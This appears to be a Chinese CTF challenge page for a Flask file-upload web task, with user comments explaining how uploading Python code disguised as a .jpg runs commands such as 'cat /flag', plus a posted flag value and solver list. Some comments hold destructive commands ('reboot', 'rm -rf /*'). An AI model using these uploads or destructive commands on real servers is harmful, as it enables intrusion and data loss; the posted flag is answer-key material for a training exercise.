Flask_FileUploadWEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Lazzaro
一血奖励: 3金币
解  决: 12058
提  示:
描  述:
Flask_FileUpload
评论
3055 2年前

import os 换行 os.system('cat /flag')

回复 2

DragonFly 2年前

import os os.system("reboot")

回复 0
tomcatkeep 2年前

("c2hhYmkgc3VucmVuYnVsaWpp")

回复 0

k19551429 2年前

场景有问题

回复 0

Hobin 2年前

这个写wp的人很厉害啊

回复 0

Hobin 2年前

这个写wp的人很厉害啊

回复 0

TamiQ 2年前

vi test.jpg 内容是 import os os.system('find / -name flag') 然后吧test.jpg上传上去,看下响应中flag文件的位置,然后把jpg的内容改成cat flag的位置,就可以了

回复 1

wangning 2年前

我们首先建一个test.py的文件,内容是python代码 import os os.system('ls -la'),因为只能上传jpg/png的格式,所以我们把文件名修改成test.jpg,系统会返回当前文件夹,以此我们得出结论,上传文件可以执行命令,我们用burp抓包,我们把代码改成 import os os.system('cat /flag'),放包,按F12就可以看到flag

回复 2

kygahd 2年前

我的方法是, 首先建个test.jpg 文件, 内容是python代码 import os os.system('ls -la') 执行系统命令列出当前文件夹的所有文件 用burp上传以后返回的结果里发现当前文件夹有app.py. 然后修改test.jpg 为 import os os.system(“cat ./app.py”) 来查看网站源码。 源码里发现一段代码为 shell('ec

回复 0

Epiphany777 2年前

jpg\png python 抓包 import os os.system('cat /flag')

回复 0

zuoqirun 2年前

flag{1c6b553c3a91791993b859e1625275ac} rm -rf /*场景炸了

回复 5

WriteUp

image
国家级划水运动员

3 金币

评分(20)

解题动态

苍穹璀璨 攻破了该题 47分钟前
DOMAKE 攻破了该题 1小时前
jie123 攻破了该题 2小时前
翻斗花园突破手 攻破了该题 4小时前
reisen 攻破了该题 1天前
ABCDHBY 攻破了该题 2天前
流风jttqh 攻破了该题 3天前
1730980796 攻破了该题 3天前
llc123 攻破了该题 4天前
1163064874 攻破了该题 5天前
theo1234 攻破了该题 6天前
ash0x 攻破了该题 9天前
kttsy 攻破了该题 9天前
peach.peach 攻破了该题 10天前
3268798994 攻破了该题 11天前
SweetSour 攻破了该题 12天前
qieding 攻破了该题 12天前
JEB_Bem 攻破了该题 13天前
forces 攻破了该题 13天前
294903544 攻破了该题 14天前
问题反馈